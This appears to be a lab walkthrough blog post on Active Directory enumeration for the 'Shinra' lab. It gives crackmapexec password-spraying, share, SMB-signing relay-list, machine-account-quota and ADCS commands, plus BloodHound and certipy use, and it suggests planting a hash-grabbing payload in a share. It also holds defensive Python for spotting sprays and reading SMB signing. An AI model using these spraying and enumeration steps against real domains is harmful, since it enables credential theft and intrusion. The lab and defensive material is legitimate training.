
VL Shinra Part 2 - Enumerate, Enumerate, Enumerate!

This is the second video of the Shinra series. Before setting foot on any of the network’s internal machines, we are going to spend a bit of time enumerating the domain from our own machine.

Some ideas for further steps that are not shown in the video:

  • Spray “Shinra2022” or variations of it against all users in the domain.
  • Place a hash grabbing payload (e.g. https://github.com/xct/hashgrab) inside the workspace share and see if you can find any hashes.

Notes

Tools

Tcpdump

tcpdump -i ens37 -s 0 -w - -U | tee output.pcap | tcpdump -r -

Credential spraying

crackmapexec smb 172.16.11.10 -u user.txt -p pass.txt --no-bruteforce --continue-on-success
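The spray above leaves a recognisable footprint on the domain controller: one source address producing logon failures for many different accounts in a short time. The following is an added example (not part of the original post, and not crackmapexec code) that flags that pattern over constructed Event ID 4625 style records; the log format, the sample addresses and user names are all assumptions made up for the example.

```python
"""Password-spray detection over Windows logon-failure events.

Added example, not part of the original post or of crackmapexec. It
flags a source that fails logons against many distinct accounts in a
short window, which is the footprint a `-u user.txt -p pass.txt` spray
leaves in the domain controller's Security log (Event ID 4625).
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records (not real log data). Fields:
# timestamp, event id, target user, source IP, logon type, NTSTATUS.
# 172.16.11.50 hits six different users in ten seconds (a spray);
# 172.16.11.77 is one user mistyping a password twice, then logging on.
# 0xC000006A = wrong password, 0xC0000064 = account does not exist.
SAMPLE_EVENTS = """\
2022-10-01T09:00:01 4625 william.davis 172.16.11.50 3 0xC000006A
2022-10-01T09:00:02 4625 jane.smith 172.16.11.50 3 0xC000006A
2022-10-01T09:00:04 4625 svc_backup 172.16.11.50 3 0xC000006A
2022-10-01T09:00:05 4625 bob.jones 172.16.11.50 3 0xC0000064
2022-10-01T09:00:07 4625 alice.wong 172.16.11.50 3 0xC000006A
2022-10-01T09:00:09 4625 it_admin 172.16.11.50 3 0xC000006A
2022-10-01T09:30:00 4625 jane.smith 172.16.11.77 2 0xC000006A
2022-10-01T09:30:15 4625 jane.smith 172.16.11.77 2 0xC000006A
2022-10-01T09:31:00 4624 jane.smith 172.16.11.77 2 0x0
"""


def parse_events(text):
    """Parse the whitespace-separated sample format into dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, event_id, user, src, logon_type, status = line.split()
        events.append({
            "time": datetime.fromisoformat(ts),
            "event_id": int(event_id),
            "user": user.lower(),
            "source_ip": src,
            "logon_type": int(logon_type),
            "status": status,
        })
    return events


def detect_spray(events, window=timedelta(minutes=5), min_users=5):
    """Return {source_ip: distinct_users} for every source whose failed
    logons touch at least `min_users` distinct accounts inside any
    `window`-long interval. Successful logons (4624) are ignored."""
    by_source = defaultdict(list)
    for ev in events:
        if ev["event_id"] == 4625:
            by_source[ev["source_ip"]].append(ev)

    hits = {}
    for src, failures in by_source.items():
        failures.sort(key=lambda e: e["time"])
        best = 0
        # Sliding window anchored at each failure in turn.
        for i, start in enumerate(failures):
            users = set()
            for ev in failures[i:]:
                if ev["time"] - start["time"] > window:
                    break
                users.add(ev["user"])
            best = max(best, len(users))
        if best >= min_users:
            hits[src] = best
    return hits


if __name__ == "__main__":
    for src, n in detect_spray(parse_events(SAMPLE_EVENTS)).items():
        print(f"possible spray from {src}: {n} distinct accounts in 5 min")
```

The distinguishing feature is distinct accounts per source, not failures per account, which is why the single user with two typos never trips the threshold. If the spray goes over Kerberos instead of NTLM, the equivalent records are Event ID 4771 (pre-authentication failure) and the same logic applies.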

Bloodhound

sudo sh -c 'proxychains python3 /home/xct/tools/dnschef/dnschef.py --fakeip 172.16.11.101 --fakedomains shinra-dev.vl -q'

proxychains bloodhound-python -c all --disable-pooling -w 1 -u "william.davis" -p 'password' -d shinra-dev.vl -dc dc.shinra-dev.vl -ns 127.0.0.1

Shares

crackmapexec smb 172.16.11.3-254 -u "william.davis" -p 'password' --shares

SMB Signing

crackmapexec smb 172.16.11.3-254 --gen-relay-list relay.txt
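What `--gen-relay-list` actually inspects is the SecurityMode field of each host's SMB2 NEGOTIATE response: a server that advertises SIGNING_ENABLED without SIGNING_REQUIRED will accept unsigned sessions. The following is an added example (not part of the original post, and not crackmapexec code) that reads that field from a raw SMB2 message, as you would when auditing your own hosts from a capture like the tcpdump one above. The response builder, its GUID and size values are constructed sample data; the field layout and flag values are the ones from the SMB2 specification.

```python
"""Read the signing policy out of an SMB2/3 NEGOTIATE response.

Added example, not part of the original post or of crackmapexec. Input
is the raw SMB2 message, i.e. the bytes after the 4-byte NetBIOS
session header on TCP 445; SMB1 uses a different header and flags and
is not handled here.
"""
import struct

SMB2_MAGIC = b"\xfeSMB"
SMB2_NEGOTIATE = 0x0000
SMB2_FLAGS_SERVER_TO_REDIR = 0x00000001
SIGNING_ENABLED = 0x0001
SIGNING_REQUIRED = 0x0002


def build_negotiate_response(security_mode, dialect=0x0311):
    """Constructed NEGOTIATE response (64-byte header + 64-byte fixed body)
    used as sample input; every field other than SecurityMode and
    DialectRevision holds a placeholder value."""
    header = struct.pack(
        "<4sHHIHHIIQIIQ16s",
        SMB2_MAGIC, 64, 0, 0, SMB2_NEGOTIATE, 1,
        SMB2_FLAGS_SERVER_TO_REDIR, 0, 0, 0, 0, 0, b"\x00" * 16,
    )
    body = struct.pack(
        "<HHHH16sIIIIQQHHI",
        65, security_mode, dialect, 0, b"\x11" * 16,
        0, 0x800000, 0x800000, 0x800000, 0, 0, 0x80, 0, 0,
    )
    return header + body


def parse_signing_mode(message):
    """Return (dialect, signing_enabled, signing_required) from an SMB2
    NEGOTIATE response, or raise ValueError if the bytes are not one."""
    if len(message) < 64 + 6 or message[:4] != SMB2_MAGIC:
        raise ValueError("not an SMB2 message")
    (command,) = struct.unpack_from("<H", message, 12)   # Command
    (flags,) = struct.unpack_from("<I", message, 16)     # Flags
    if command != SMB2_NEGOTIATE or not flags & SMB2_FLAGS_SERVER_TO_REDIR:
        raise ValueError("not a NEGOTIATE response")
    # Fixed body follows the 64-byte header: StructureSize, SecurityMode, DialectRevision
    struct_size, security_mode, dialect = struct.unpack_from("<HHH", message, 64)
    if struct_size != 65:
        raise ValueError(f"unexpected NEGOTIATE response size {struct_size}")
    return (dialect,
            bool(security_mode & SIGNING_ENABLED),
            bool(security_mode & SIGNING_REQUIRED))


def classify(message):
    """'required' (unsigned sessions rejected), 'enabled' (signing offered
    but unsigned sessions still accepted) or 'disabled'."""
    _, enabled, required = parse_signing_mode(message)
    if required:
        return "required"
    return "enabled" if enabled else "disabled"


if __name__ == "__main__":
    for mode in (SIGNING_ENABLED | SIGNING_REQUIRED, SIGNING_ENABLED, 0):
        print(hex(mode), classify(build_negotiate_response(mode)))
```

Only the "required" outcome keeps a host off a relay list; "enabled" is the default for Windows member servers and workstations and is what the scan above is hunting for, while domain controllers require signing out of the box. Enforcing it fleet-wide is the fix (the "Microsoft network server: Digitally sign communications (always)" policy), which is the check worth re-running after any hardening change.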

Machine Account Quota

crackmapexec ldap 172.16.11.101 -u "william.davis" -p 'password' -M maq

ADCS

crackmapexec ldap 172.16.11.101 -u "william.davis" -p 'password' -M adcs
crackmapexec ldap 172.16.11.101 -u "william.davis" -p 'password' -M adcs -o SERVER=shinra-dev-CA
certipy find -u "william.davis" -p 'password' -dc-ip 172.16.11.101

This post is licensed under CC BY 4.0 by the author.